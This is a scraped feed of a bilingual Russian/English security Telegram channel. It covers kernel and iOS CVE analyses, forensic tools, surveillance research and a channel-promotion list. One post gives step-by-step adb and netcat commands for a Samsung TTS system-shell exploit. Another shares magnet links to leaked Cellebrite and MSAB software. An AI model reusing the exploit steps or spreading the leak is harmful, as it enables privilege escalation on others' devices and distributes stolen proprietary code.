ещё в августе 2022 начали активно использовать данный вектор первичного доступа.#DFIR #malware #OneNote #InitialAccess #VBS #bat #obfuscation #MacroPackPro
2023-01-25 22:47:18
🦠Вредоносные OneNote документы🦠Malicious OneNote Docs📕RedTeam With OneNote Sections. Windows Initial Vector Series#DFIR #malware #OneNote #InitialAccess #VBS #bat #obfuscation #MacroPackPro
2023-01-25 20:11:53
|Короткий анализ CVE-2023-0394|🤙Продолжаем знакомиться с багами вместе с Шизо.💥После прочтения статьи от Seth Jenkins на GP0 про эксплуатацию багов NULL-разыменований в ядре Linux:"Exploiting null-dereferences in the Linux kernel ", начал искать последние исправления в ядре Linux и наткнулся на CVE-2023-0394(разыменование NULL-указателя в Linux ядре), причем в случае когда мы этот баг стриггерим, то получим oops(ядро не останавливает все выполнение по сравнению с kernel panic, приводящей к прекращению выполнения когда нет безопасного способа продолжить оное).Данный баг был обнаружен Kyle Zeng в функции rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,struct raw6_sock *rp){...}, которая находится в файле: net/ipv6/raw.c. Суть заключается в том, что данная функция напрямую использовала длину в качестве объема данных в cork-очереди, наглядно это можно увидеть в переменной total_len, когда происходит вычисляется длина заголовка расширения вместе с количеством допустимых данных в cork-очереди сокета(на скриншоте 1, который приложил выше - отметил):total_len = inet_sk(sk)->cork.base.lengthДалее, нас интересует NULL-разыменование при вызове функции skb_transport_offset с аргументом в виде переменной skb: skb_transport_offset(skb); , которая в итоге имеет значение NULL. Почему же значение переменной skb будет в конечном итоге NULL? Как видно на скриншоте 2, происходит определение переменной-указателя csum_skb значением NULL и в том случае, когда переменная offset больше объема данных в cork-очереди сокета, но меньше допустимой длины данных + длина заголовка расширения, то будет происходить вход в if (offset >= len) всегда, что собственно приведет в состояние когда никогда csum_skb не будет установлен(На скриншоте 3 отметил маркером для наглядности). И как писал уже выше, в таком случае значение конечной переменной skb будет равно NULL, что приведет в итоге к NULL-разыменованию.🔖PoC, сгенирированный фаззером syzkaller ➡️неудобочитабельность кода .📑С патчем(коммитом), закрывающем данную багу можно ознакомиться тут. ⚠️Важно! Чтобы затригерить баг, нам нужен рут или пользователь, который находится в сетевом пространстве имен. Сама уязвимость относится к следующим версиям ядра: 6.1, 5.15, 5.10, 5.4, и 4.19.
2023-01-24 18:00:37
📡DensePose From WiFi#WiFi #AI #ML #DNN #radar #privacy #recognize
2023-01-24 17:59:30
|DensePose From WiFi|📡Зондируем(распознаем) людей без всяких дорогих RGB-камер, LiDAR и навороченных радаров. Мне лишь в больных фантазиях(хотя радарами и радиолокацией ранее увлекался) могла прийти идея про использование только Wi-Fi сигналов в качестве входных данных для слежки за людьми(в плане оценки позы человека), хотя авторы предлагают использовать в благих целях для сегментации и обнаружения ключевых точек тела с сохранением конфиденциальности и по сути копеечное решение. Исследователи в работе рассказывают про разработанную нейронку, способную сопоставить полученную фазу и амплитуду сигналов Wi-Fi(используя Wi-Fi антенны в виде 1D-датчиков) с UV-координатами в пределах 24 человеческих регионов.То есть, если говорить просто и обобщенно, то используя открытия в радиолокации(сигналы Wi-Fi) и глубоком обучении(компьютерное зрение), можно собрать систему для наблюдения за положением(оценить плотную позу нескольких объектов) людей, потратив средства лишь на Wi-Fi антенны и совместив с уже разработанной исследователями глубокой нейронкой. Более подробно можно почитать в прикладываемом ниже файле.📡 We probe(recognize) people without any expensive RGB cameras, LiDAR and fancy radars. It was only in my sick fantasies (although I was previously fond of radars and radar) that I could come up with the idea of using only Wi-Fi signals as input data for tracking people (in terms of assessing a person's posture), although the authors suggest using it for good purposes for segmentation and detection of key points of the body while maintaining confidentiality and, in fact, a penny the solution. The researchers in their work talk about a developed neural network capable of comparing the received phase and amplitude of Wi-Fi signals (using Wi-Fi antennas in the form of 1D sensors) with UV coordinates within 24 human regions.That is, to put it simply and generically, using discoveries in radar (Wi-Fi signals) and deep learning (computer vision), it is possible to assemble a system to monitor the position (evaluate the tight posture of several objects) of people, spending money only on Wi-Fi antennas and combining it with the deep neural network already developed by researchers.You can read more in the attached file below.#WiFi #AI #ML #DNN #radar #privacy #recognize
2023-01-24 17:59:05
#WiFi #AI #ML #DNN #radar #privacy #recognize
2023-01-23 15:37:27
💥Private Shizo 1day link(fully free)
2023-01-23 15:27:44
🔥🔥🔥TOCTOU(time-of-check-time-of-use) vulnerability in IOHIDFamily( CVE-2022-42864: Diabolical Cookies(race condition), fixed in iOS 16.2 / macOS Ventura 13.1)💥PoC exploit here🔖Write-up hereIssues with exploitation:The main obstacle to overcome when exploiting this issue is that the buffer we are overflowing out of belongs to KHEAP_DATA_BUFFERS, so exploitation targets are limited. In this PoC @Muirey03 chose to target kmsg headers, as these are one of very few structures in KHEAP_DATA_BUFFERS that contain kernel pointers. The "arbitrary kfree" primitive I obtained using this approach is the same primitive used in the multicast_bytecopy exploit, however the IOSurfaceClient array is now PAC'd and forged clients need to have a valid pointer back to the IOSurfaceRootUserClient that created them, rendering this no longer a desirable kernel r/w target.
2023-01-23 12:20:24
📕Surveillance Technologies Are Imbedded into the Fabric of Modern Life–The Intelligence Community Must Respond.#Surveillance #Intelligence #Mitre #mobile #location #services #security #anonymity #identification #fingerprinting
2023-01-23 12:20:00
📕Surveillance Technologies Are Imbedded into the Fabric of Modern Life–The Intelligence Community Must Respond.🕵️‍♂️Небольшая работа от Mitre про непрерывно собираемые данные о пользователях(идентификационные данные, местоположение и подключения), которые достаются из устройства даже в случае отключенного местоположения, различных служб, питания или оно работает без компрометирующих сервисов(на самом деле - все интереснее и те, кто читают канал относительно давно - понимают, что отключение сервисов без закапывания в исходники(проведения RE системы/приложения/ОС/протокола связи и тд) - опиум ) . Работа по сути почти не содержит в себе технических деталей, поэтому поможет начинающим в понимании слежки за их устройствами.Так что при вхождении в изучение слежки(сбор данных) за пользователями- подойдет, некоторые узнают про собираемые данные посредством: мобильных приложений, SDKs, APIs, активности пользователя в браузере и фингерпринтинг устройства.🕵️‍♂️A little work from Mitre about continuously collected data about users (identification data, location and connections), which are obtained from the device even in the case of a disconnected location, various services, power, or it works without compromising services (in fact, it's more interesting and those who have been reading the channel for a relatively long time understand that disabling services without instilling in the source code (conducting a RE system / application / OS / communication protocol, etc.) - opium). The work in fact contains almost no technical details, so it will help beginners in understanding the surveillance of their devices.So when entering into the study of surveillance (data collection) for users- it is suitable, some will find out about the collected data through: mobile applications, SDKs, APIs, user activity in the browser and device fingerprinting .#Surveillance #Intelligence #Mitre #mobile #location #services #security #anonymity #identification #fingerprinting
2023-01-23 12:19:43
#Surveillance #Intelligence #Mitre #mobile #location #services #security #anonymity #identification #fingerprinting
2023-01-21 18:26:15
❗️По рейтингу 2023-го года ТОП самых полезных каналов по информационным технологиям, информационной безопасности, OSINT : Новости, статьи, книги, курсы, полезные советы. Кладезь бесценной информации!• Freedom F0x — авторский канал всеми уважаемого Паши Ситникова -  этического хакера, специалиста по информационной безопасности и osint. Статьи, уникальные советы, книги, курсы. Будь всегда в теме.• Интернет-Розыск — Шерлоки Холмсы цифровой эпохи. Ресурсы где ты изучишь osint и информационную безопасность, будешь всегда в курсе событий.•  Investigation&Forensic Tools — канал-каталог программ и методов для проведения расследований и прикладного криминалистического анализа.• T.Hunter — канал повещен информационной безопасности и пентесту. Будь в курсе всех  последних новостей мира ИБ.•  Библиотека разведчика Osint — крупнейшая в своем роде библиотека по теме OSINT. Тут ты найдешь уникальную и полезную информацию, книги, курсы, статьи и трюки для поиска информации о цели.•  Max Open Source — полезные статьи и бесплатные курсы по пентесту и информационным технологиям, программированию и IT.• 0% Privacy — канал профессионала своего дела, посвящен анонимности, osint и информационной безопасности, будь в курсе последних трендов и самых свежих уязвимостей. Только эксклюзивная информация.• Нетипичный Безопасник — авторский канал специалиста по информационной безопасности и osint, всеми уважаемого Мефодия Келевра, отборные статьи, уникальная информация, советы.• Digital-Разведка — Главный агрегатор инноваций, интересных решений и инструментов по OSINT и близким наукам.• OSINT-SAN Project — osint framework для linux, включающий в себя большое количество модулей, имеющий огромную DB, в связке с различными сканерами и встроенными API.• OSINT | Форензика — русскоязычное сообщество по обсуждению osint и Форензики.•  IT MEGA — тут эксклюзивные материалы, курсы по программированию, информационной безопасности, "хакингу", osint и IT. (новинка)• Blackat — канал об IT-технологиях, osint и информационной безопасности.• Заметки CyberScout'а — канал, обозревающий тематику применения OSINT (и не только) в сфере противодействия киберпреступности и иных разведывательных мероприятий.Знание - это сила! "Кто владеет информацией, тот владеет миром!"Всем авторам хочется выразить отдельно благодарность, вы достойны 🤝❗️Подпишись, будь всегда в теме!
2023-01-20 17:18:04
🔥🔥🔥System Shell Exploit(get UID 1000) - ALL Samsung Mobile Devices NO BL UNLOCK REQUIRED( based on CVE-2019-16253, SamsungTTS before 3.0.02.7 and 3.0.00.101 for Android allows a local attacker to EoP, e.g., to system privileges).How to reproduce(github repo):1️⃣Install the included "komraids_POC_V1.6.apk" to the device, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) ➡️ Chmod 777 /data/local/tmp/samsungTTSVULN2.apk >>> I advice disabling all battery optimizations for Samsung TTS and Shell, otherwise, it cuts off the shell from time to time.2️⃣Make sure ADB is on, Connected and authorized and all power saving is off (as mentioned above) Reboot device.3️⃣When device reboots, run this command from ADB. adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk ➡️ it will return "Success" when done.4️⃣Now, open two shells, in the first, do nc -lp 9997 & in the second, do am start -n com.samsung.SMT/.gui.DownloadList➡️ Look back at the first shell., it should have opened into a new system (UID 1000) shell.⚠️This PoC Should point at localhost port 9997, so nc -lp 9997 into it once built.
2023-01-20 09:37:32
|AppSec Ezine|📰466rd EditionRelease Date: 20/01/2023pathonprojectgithub#ezine #appsec #infosec
2023-01-19 15:47:00
📕Hide and Seek with Spectres: Efficient discovery of speculative information leaks with random testing.⚙️Revizor(sca-fuzzer) is a microarchitectural fuzzer. It is a rather unconventional fuzzer as, instead of finding bugs in programs, Revizor searches for microarchitectural vulnerabilities in CPUs.#security #vulnerability #sideChannel #speculativeLeaks #Spectre #Meltdown #MDS #fuzzing #AMD #Intel
2023-01-19 15:46:42
#security #vulnerability #sideChannel #speculativeLeaks #Spectre #Meltdown #MDS #fuzzing #AMD #Intel
2023-01-19 11:52:25
|ipsw|📲Данный инструмент(ipsw) уже проверен временем и служит для копания во внутренностях iOS/macOS. По сути, как и пишет автор - "Швейцарский нож" в области исследования iOS/macOS. Простой в установке и использовании, написан на GO и активно развивается.ipsw состоит из следующих компонентов:⚙️IPSW downloader/exploder⚙️OTA downloader/exploder⚙️Mach-O парсер⚙️Дампер ObjC классов⚙️Дампер Swift классов ⚙️dyld_shared_cache парсер⚙️kernelcache парсер⚙️img4 парсер/декриптор⚙️device-tree парсер⚙️ARMv9-a дизассемблер🔖Руководства🧰Также есть инструмент, который можно использовать для загрузки и декрипта образов прошивки iOS(64-бит). Taco написан на раст, правда последний коммит датируется 23-м октября 2022 года и в целом лучше использовать ipsw в силу большей актуальности и большего функционала. Еще есть от автора taco, инструмент autodecrypt, из названия которого итак понятно для чего он нужен(декрипт образов прошивки iOS):сбор ключей и декрипт образа прошивки(iBoot/LLB/iBSS/iBEC). Decrypt же написан на python.📲This tool has already been tested by time and is used to dig into the internals of iOS/macOS. In fact, as the author writes, it is a "Swiss knife" in the field of iOS/macOS research. Easy to install and use, written in GO and actively developing.ipsw consists of the following components:⚙️IPSW downloader/exploder⚙️OTA downloader/exploder⚙️Mach-O parser⚙️ObjC class-dumpe⚙️Swift class-dump ⚙️dyld_shared_cache parser⚙️kernelcache parser⚙️img4 parser/decrypter⚙️device-tree parser⚙️ARMv9-a disassembler🔖Guides🧰There is also a tool that can be used to download and decrypt iOS firmware images (64-bit). Taco is written in rust, although the last commit dates back to October 23, 2022, and in general it is better to use ipsw due to more relevance and more functionality. There is also from the author of taco, the autodecrypt tool, from the name of which it is so clear why it is needed (the decrypt of iOS firmware images):key collection and decryption of the firmware image (iBoot/LLB/iBSS/iBEC). Decrypt is written in python.#AppleInternals #iOS #arm #macOS #dyld #research #IPSW #OTA #macho #firmware #img4
2023-01-19 11:52:15
#AppleInternals #iOS #arm #macOS #dyld #research #IPSW #OTA #macho #firmware #img4
2023-01-19 10:45:36
#DFIR #Investigation
2023-01-18 21:48:48
|DumpBTM|🕵️‍♂️Наконец вышел аналог sfltool с флагом dumpbtm(вывод текущего состояния фоновых элементов и элементов входа, причем включая UUIDs загруженных пэйлоадов servicemanagement) с открытым исходным кодом - DumpBTM. Для чего можно использовать сей инструмент? Дампить записи о закреплении установленных элементов, получая данные из проприетарного файла в macOS: BackgroundItems-v4.btm (элементы входа в систему, агенты/демоны запуска). По сути данный инструмент можно использовать для поиска в системе закрепленных вредоносов(пост на канале тут) или интегрировать в свой инструмент/тулкит мониторинга.⚠️Внимание! Для чтения и несериализации BackgroundItems-v4.htm требуется FDA(полный доступ к диску). BackgroundItems-v4.btm в macOS Ventura 13 можно найти тут: /private/var/db/com.apple.backgroundtaskmanagement/.🕵️‍♂️Finally, an analogue of sfltool with the dumpbtm flag (output of the current state of background elements and input elements, including the UUIDs of loaded servicemanagement payloads) with open source - DumpBTM. What can this tool be used for? Dump the pinning records of installed elements by getting data from a proprietary file in macOS: BackgroundItems-v4.btm(login elements, startup agents/daemons). In fact, this tool can be used to search for persistence malware(post on the channel here) in the system or integrated into your monitoring tool/toolkit.⚠️Attention! For reading and unserialize BackgroundItems-v4.htm requires FDA (full disk access). BackgroundItems-v4.btm in macOS Ventura 13 can be found here: /private/var/db/com.apple.backgroundtaskmanagement/.#DFIR #dump #macOS #security #malware #persistence
2023-01-18 21:48:33
#DFIR #macOS #security #malware #persistence
2023-01-18 19:40:26
|IPv6 Security Guidance|У АНБ вышло руководство для облегчения перехода с IPv4 на IPv6, про смягчения проблем и обеспечения безопасности(и выявление проблем безопасности при переходе) в первую очередь для DoD(МО) и работающих там сисадминов. Пока сети в DoD являются "dual-stacked"(работают на IPv4 и IPv6 одновременно), поверхность для атак увеличивается, что дает больше возможностей атакующим, хотя с точки зрения развертывания IPv6 - более предпочтительный. 🛡The NSA has issued a guide to facilitate the transition from IPv4 to IPv6, about mitigating problems and ensuring security (and identifying security problems during the transition) primarily for DoD and sysadmins working there. While the networks in DoD are "dual-stacked" (they work on IPv4 and IPv6 at the same time), the surface for attacks increases, which gives more opportunities to attackers, although IPv6 is more preferable from the point of view of deployment.#security #network #NSA #DoD #IPv6
2023-01-18 19:39:22
#security #network #NSA #DoD #IPv6
2023-01-18 15:21:43
🔥🔥🔥Linux kernel stack buffer overflow in nftables(CVE-2023-0179)The vulnerability consists of a stack BOF due to an integer underflow vulnerability inside the nft_payload_copy_vlan function, which is invoked with nft_payload expressions as long as a VLAN tag is present in the current skb.⚠️The exploitation could allow the leakage of both stack and heap addresses and, potentially, a LPE to the root user via arbitrary code execution.🔜PoC coming soon!💥CVE-2023-0179 is exploitable starting from commit f6ae9f1(nft_payload: add C-VLAN support ) up to commit696e1a48b1a1(nft_payload: incorrect arithmetics when fetching VLAN head, security patch).
2023-01-16 23:37:18
|DumpIt for linux|🕵️‍♂️Наконец-то вышел Dumpit на Linux! Для тех, кто не в курсе, раньше была версия только для Windows(является частью пакета Comae Memory Toolkit) и данный инструмент использовался для сверхбыстрого сбора и дальнейшего анализа памяти, генерируя полные краш-дампы памяти, работая в кернел-моде и основанный на формате Microsoft Crash Dump (совместимость результатов с WinDbg, Comae Platform, crash и drgn ), причем без BSOD. В случае с версией для Linux(основывается на /proc/kcore), для работы DumpIt не требуется LKM(Linux Kernel Module), однако требуется запуск из под рута, причем утилита использует формат Linux ELF CORE(как ранее упоминалось, в Windows-версии формат: Microsoft Crash Dump) , который совместим с gdb, crash, и drgn и формат сжатия архивов .tar.zst и за счет используемого в нем алгоритма сжатия zstandard(zstd) , оно проходит очень быстро.И да, возрадуйтесь фанаты раста, эта утилита написана на нем, за счет чего более безопасна для памяти и можно прикрутить дополнительные параметры удаленной потоковой передачи. Не мало важна еще и простота использования, то есть для получения краш дампа ядра в формате сжатия tar.zst(имя сгенерировано по умолчанию) на потребуется выполнить следующую команду(почему sudo - читаем выше):sudo dumpitforlinux 🕵️‍♂️Dumpit has finally been released on Linux! For those who are not aware, there used to be a Windows-only version (it is part of the Comae Memory Toolkit package) and this tool was used for ultra-fast collection and further analysis of memory, generating full crash dumps of memory, working in kernel mode and based on the Microsoft Crash Dump format (compatibility of results with WinDbg, Comae Platform, crash and drgn), and without BSOD. In the case of the Linux version (based on /proc/kcore), DumpIt does not require LKM (Linux Kernel Module) to work, however, it requires running from under root, and the utility uses the Linux ELF CORE format (as previously mentioned, in the Windows version, the format is Microsoft Crash Dump), which is compatible with gdb, crash, and drgn and the archive compression format .tar.zst and due to the zstandard(zstd) compression algorithm used in it, it passes very quickly.And yes, rejoice rust fans, this utility is written on it, due to which it is more secure for memory and you can fasten additional parameters for remote streaming. Ease of use is also important, that is, to get a crash dump of the kernel in tar.zst format (using default name), you will need to run the following command (why sudo - read above):sudo dumpitforlinux#DFIR #forensics #Linux #ELFcoreDump #MemoryAcquisition #malwareAnalysis #dump #x86 #x64 #ARM64
2023-01-16 23:36:57
#DFIR #forensics #Linux #ELFcoreDump #MemoryAcquisition #malwareAnalysis #dump #x86 #x64 #ARM64
2023-01-16 22:19:55
🔥XNU VM copy-on-write bypass due to incorrect shadow creation logic during unaligned vm_map_copy operationsbuild this PoC like this:clang -O1 -o unaligned_write_to_cow_bypass unaligned_write_to_cow_bypass.cAfter running for a short while it should print out:e1 isn't 'A'
2023-01-16 22:18:07
🤙Шизо на связи!🔥🔥🔥Если посмотреть на PoC от Ian Beer для CVE-2022-46689, то можно лишь удостовериться насколько он крутой специалист. Во-первых, мы теперь точно знаем, что это LPE! Во-вторых, в реализации MacDirtyCow от Чжуовэйя не было записи последнего байта на странице размером 16Кб, то есть вместо лишь 16383 байт из каждых 16384 байтов можно перезаписать(последний байт страницы не выходило у Чжуовэйя перезаписать из-за того, что адрес записи становился выравненным и баг происходил лишь в случае с не выровненными r/w адресами ), а Ian Berr смог. Думаете как Ian Beer это решил? Он решил перемещать read-адрес, заместо перемещения write-адреса. Также стоит отметить, что благодаря Ian Beer, у нас руки стали развязанными, по причине того, что больше нет ограничения на объем записи в 16Кб в случае успешной эксплуатации, так что мы можем на уязвимых устройствах без каких-либо специальных условий что угодно. То есть план Ian'a: 1️⃣запустить бинарь, способный читать /usr/libexec/*2️⃣вызвать ошибку во второй раз для произведения манипуляций с amfid или trustd.3️⃣Профит!Круто? По мне - так точно! Только вот не получится сделать kernel r/w(также мы не можем записывать в двоичные текстовые сегменты или общий кэш, хотя с kernel r/w под вопросом и не думаю что двойного race condition можно добиться). Хотя и в /System/Library многоинтересных кандидатов. Да и в целом благодаря Ian Beer, мы получаем возможность писать в любой vm_object(получая только read-only mapping)Также интересно и просто Ian Beer поборолся с подписью кода(code signing), не позволяющей переписывать код бинаря. Как думаете? А ответ вроде и незамысловатый, а по сути решает проблему: нужно перезаписать LINKEDIT-данные бинаря, заместо ранее упомянутой возни с подписью кода. Тем самым, захватывая системных демонов!☺️Из приятного: по сравнению с многими другими сплоитдевами, Ian Beer продолжает работать над этим эксплойтом, публикуя попутно новую информацию и ожидается интересный пост в блоге GP0. Для тех кто забыл:
2023-01-16 22:12:54
#security #expoitation #LPE #raceCondition #bypass #COW #MacDirtyCow #XNU #macOS #iOS #sandbox #overwrite #IanBeer
2023-01-16 11:47:57
🕵️‍♂️Хоть у меня и неоднозначное отношение к CTF в целом, однако у Magnet Forensics нередко выходят CTF для DFIR-специалистов, задачи в которых пересекаются с реальными. Данные образы различных систем: Windows, macOS, iOS 15(полная ФС), Android и Linux, могут помочь при изучении методов/способов извлечения и общего взаимодействия с образами для обучения или при исследовании определенной системы.⛓Загрузить и провести интересно время можно тут.🕵️‍♂️Although I have an ambiguous attitude to CTF in general, Magnet Forensics often has CTFs for DFIR specialists whose tasks overlap with real ones. Data images of various systems: Windows, macOS, iOS 15 (full FS), Android and Linux, can help when studying methods/methods of extraction and general interaction with images for training or when researching a specific system.⛓You can download and have an interesting time by following here.#CTF #DFIR #forensics #Chromebook #Windows #macOS #Linux #Android #iOS #memory
2023-01-15 12:30:08
Обожаю своих подписчиков за их дотошность)Ну, по порядку. Warden - хорошая, но заброшенная прога для работы с трекерами и логгерами в приложениях. Сам юзал, давал на курсе.com.android.imsserviceentitlement - пакет, внезапно, присутствующий в Android 12. В любой прошивке. Я, например, дергал его из Graphene OS, которую позиционируют как "полностью свободную" (см. скрины выше). Как он идет в исходниках AOSP, так и кочует по прошивкам, без изменений. Нужна эта приложулька типа как для нормальной работы Voice-over-LTE (VoLTE) и все в этом роде.Google Firebase Analytics - понятно по названию.Почему я вдруг решил запостить этот, казалось бы, "бытовой" вопрос от подписчика? Да чтобы вы понимали: "полностью свободных" прошивок из коробки не существует. Все нужно щупать своими руками. И своими руками редактировать, в данном случае отключать конкретные компоненты (см. скрины ниже).
2023-01-14 20:53:49
📕Data Breach Investigations Report 2022#DBIR #breaches #incidents #Investigation
2023-01-14 20:53:14
#DBIR #breaches #incidents #Investigation
2023-01-14 20:11:55
#Israel #Sweden #Cellebrite #MSAB #leak #forensics #intelligence #military
2023-01-14 20:11:40
🕵️‍♂️На DDoSecrets(ссылка на веб-страницу тут) появилась еще одна утечка Cellebrite, только уже доступная для скачивания всем без ограничения, как было в прошлый раз с загрузкой по запросу.Данная утечка не первой свежести(хотя в публичном доступе - появилась недавно) и помимо Cellebrite, утекли данные еще и MSAB, которая тоже разрабатывает форензик-софт для правоохранительных и разведывательных органов и военных в основном, не забывая про частные компании, налоговые органы, пограничного контроля и так далее. Для чего софт не редко применялся - думаю не стоит говорить. В утечке содержится ПО и внутренняя документация обеих компаний.🕵️‍♂️ Another Cellebrite leak has appeared on DDoSecrets(link to the web page here), only it is already available for download to everyone without restriction, as it was last time with a download on request.This leak is not the first freshness (although it has recently appeared in public access) and in addition to Cellebrite, MSAB also leaked data, which also develops forensic software for law enforcement and intelligence agencies and the military mainly, not forgetting about private companies, tax authorities, border control and so on. What the software was not rarely used for - I think it's not worth talking about. The leak contains software and internal documentation of both companies.Ниже будут Magnet-ссылки и под постом прикладываю торрент-файлы/Below there will be Magnet links and under the post I attach torrent files:💥Cellebrite:magnet:?xt=urn:btih:f881291ab69fff48393ede2e36a4f8fcb4b5bf7a&dn=cellebrite&tr=http%3A%2F%2Ftracker.openbittorrent.com%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A6969%2Fannounce&tr=https%3A%2F%2Fopentracker.i2p.rocks%3A443%2Fannounce&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce&tr=udp%3A%2F%2Fexodus.desync.com%3A6969%2Fannounce&tr=udp%3A%2F%2Fexodus.desync.com%3A6969%2Fannounce💥MSAB:magnet:?xt=urn:btih:0e7d11a34f71887aca3a388795e0b019cca44858&dn=msab.tar.zst&tr=http%3A%2F%2Ftracker.openbittorrent.com%3A80%2Fannounce&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A6969%2Fannounce&tr=https%3A%2F%2Fopentracker.i2p.rocks%3A443%2Fannounce&tr=udp%3A%2F%2Fopen.stealth.si%3A80%2Fannounce&tr=udp%3A%2F%2Fexodus.desync.com%3A6969%2Fannounce&tr=udp%3A%2F%2Fexodus.desync.com%3A6969%2Fannounce#Israel #Sweden #Cellebrite #MSAB #leak #forensics #intelligence #military
2023-01-14 20:11:22
#Israel #Sweden #Cellebrite #MSAB #leak #forensics #intelligence #military
2023-01-13 20:40:35
😉Привет, дорогой подписчик или путешествующий читатель. Надеюсь, что у тебя хорошо начался год, а если нет - еще многое впереди и посему не стоит разочаровываться или опускать руки. Желаю отличного отдыха на выходных, прекрасного ментального состояние и чтобы время прошло с пользой для тебя. 😉Hello, dear subscriber or traveling reader. I hope that the year has started well for you, and if not, there is still a lot ahead and therefore you should not be disappointed or give up. I wish you a great weekend vacation, a wonderful mental state and that the time has passed with benefit for you.
2023-01-13 15:15:56
Продолжаем знакомиться с "новыми" багами с Шизо.💥Pre-Auth Remote DoS в NVMe(ядро Линукс, CVE-2023-0122)Начиная с коммита db1312dd95488b5e6ff362ff66fcf953a46b1821 было введено разыменование NULL-указателя в nvmet_setup_auth()(drivers/nvme/target/auth.c, функция аутентификации), которое привело к багу и дальнейшей эксплуатацией с достижением удаленного DoS на этапе предварительной аутентификации, причем от злоумышленнику не нужно быть авторизированным клиентом.Начиная с версии 6.0-rc2 в target/auth.c(строка 196), при возникновении ошибки с ctrl->ctrl_key, то ей присваивается значение NULL , а разыменование происходит при вызове pr_debug().То есть баг возникает, как выяснилось уже после коммита(в версии 6.0-rc4), перекрывающего эту багу, из-за отсутствия инструкции goto(goto out_free_hash;) после присвоения ctrl->ctrl_key значения NULL, что приводит к появлению NULL-указателя. Разыменование происходит в следующем отрывке кода(отсюда и досюда(включительно)):ctrl->ctrl_key = nvme_auth_extract_key(host->dhchap_ctrl_secret + 10, host->dhchap_ctrl_key_hash);if (IS_ERR(ctrl->ctrl_key)) { ret = PTR_ERR(ctrl->ctrl_key); ctrl->ctrl_key = NULL; <--- Assigning NULL}pr_debug("%s: using ctrl hash %s key %*ph\n", func, ctrl->ctrl_key->hash > 0 ? <--- NULL pointer dereference nvme_auth_hmac_name(ctrl->ctrl_key->hash) : "none", (int)ctrl->ctrl_key->len, ctrl->ctrl_key->key);Далее, эксплуатация. Нам нужно добиться разыменования NULL-указателя для достижения DoS на таргет-машине, правильно? Для этого атакующий собирается удаленно подключиться к подсистеме NVMe по типу NVMe-TCP(nvme connect) при условии, что невалидный dhchap_ctrl_key сконфигурирован в таргет-NVMe жерты под объектом хоста. Как производится байпасс ранее описанной функции аутентификации? После сетевого сниффинга, злоумышленник может найти в трафике NQN разрешенного клиента и передать значение в ранее указанную команду nvme connect.⚠️Подводя итоги, хочется сказать что бага не особо полезная, так как затрагивает версии с v6.0-rc1 до v6.0-rc3(выше писал, что в v6.0-rc4 баг закрыт) , что очень сильно сужает круг таргетов, да и даже в случае успешной эксплуатации из-за природы баги, приводящей к DoS -особо ничего интересно не получим.
2023-01-13 14:41:23
📕Batching of Tasks by Users of Pseudonymous Forums: Anonymity Compromise and Protection🔖Github repo(batching-privacy)#security #privacy #anonymity #deanonymization #Forums
2023-01-13 14:41:05
#security #privacy #anonymity #deanonymization #Forums
2023-01-13 11:52:04
|AppSec Ezine|📰465rd EditionRelease Date: 13/01/2023pathonprojectgithub#ezine #appsec #infosec
2023-01-13 00:22:57
|IPv8 - how is it with the face, IPv6?|🛡This repository is an implementation of the IPv8 p2p overlay network on python (a Python 3 package that combines the functions of p2p communications from Dispersy (a platform for simplifying the design of distributed communities) and Tribler (a BitTorrent client that focuses on anonymous downloading)), which provides authenticated communication with privacy. The essence of design is to provide communication between pairs of public keys: IP addresses and connection points to a physical network (and they are abstracted), if you want, you can read what the design of IPv8 was originally here. The goals that the developers have set cannot but please:💾Authentication. The interesting thing is that secrets are never transmitted over the Internet in the case of an initial key exchange, that is, they do not pass through the Internet in any form (even encrypted).💾Privacy. Based on the onion routing protocol (including Tor), one of the main sores was treated: it can be used in conditions with zero trust, that is, the thing that I did not have time to touch on at the presentation in the person of "trusted" servers of the central directory, which can be used to deanonymize the owners of onion resources and users. So, you can do without them in this case. Well, where without end-to-end encryption with perfect secrecy of forwarding.💾No infrastructure dependency. Decentralization, what else can I say: a central web server, a support server and a support fund - we don't need it.Universal connection (establishing direct connections (for example, connecting users for NAT or firewall) in so-called difficult network situations). From the interesting: implementation of traversal NAT technique (UDP hole-punching, you can read here)💾A network of trust. The essence is simple: you specify who you trust or who you know, and a "magic" network of trust can be created automatically, or it may not be created automatically.The following links can help in mastering:🔖 Documentation🔖 Creating our first network overlay🔖 Configuration🔖 Key generation🔖 Message serialization formats#security #privacy #network #anonymity #p2p #overlay
2023-01-13 00:22:47
|IPv8 - как там с лицом, IPv6?|🛡Данный репозиторий является имплементацией IPv8 p2p оверлейной сети на питоне(пакет Python 3, объединяющий в себе функции p2p-коммуникаций от Dispersy(платформа для упрощения проектирования распределенных сообществ) и Tribler(BitTorrent-клиент, у которого сделан акцент на анонимном скачивании)), которая обеспечивает аутентифицированную связь с сохранением приватности. Сущность дизайна(проектирования) состоит в обеспечении связи между парами открытых ключей: IP-адреса и точки подключения к физической сети(причем они абстрагируются), если есть желание то можно почитать какой изначально был дизайн у IPv8 тут. Цели, которые поставили разработчики не могут не радовать:💾Аутентификация. Из интересного: секреты никогда не передаются через Интернет в случае первоначального обмена ключами, то есть ни в каком виде(даже в зашифрованном) они не проходят через Интернет.💾Приватность. Основываясь на луковичном протоколе маршрутизации(Tor в том числе), произошло лечение одной из главных болячек: можно пользоваться в условиях с нулевым доверием, то есть вещь которую не успел затронуть на выступлении в лице "доверенных" серверов центрального каталога, которые можно использовать для деанонимизации владельцев луковичных ресурсов и пользователей. Так вот, можно в этом случае обойтись без них. Ну и куда же без без сквозного шифрования с идеальной секретностью пересылки.💾Отсутствие зависимости от инфраструктуры. Децентрализация, что тут еще сказать: центральный веб-сервер, сервер поддержки и фонд поддержки - нам без нужды.💾Универсальное подключение(установление прямых соединений(к примеру - подключение юзеров за NAT или фаерволл) в так называемых трудных сетевых ситуациях). Из интересного: реализация traversal NAT техники(UDP hole-punching, почитать можно тут)💾Сеть доверия. Суть проста: указываешь кому доверяешь или кого знаешь и "волшебная" сеть доверия может создаться в автоматическом режиме, а может и не создаться автоматически.Следующие ссылки могут помочь в освоении:🔖 Документация🔖 Создаем свой первый сетевой оверлей🔖 Конфигурирование 🔖 Генерирование ключей🔖 Форматы сериализации сообщений #security #privacy #network #anonymity 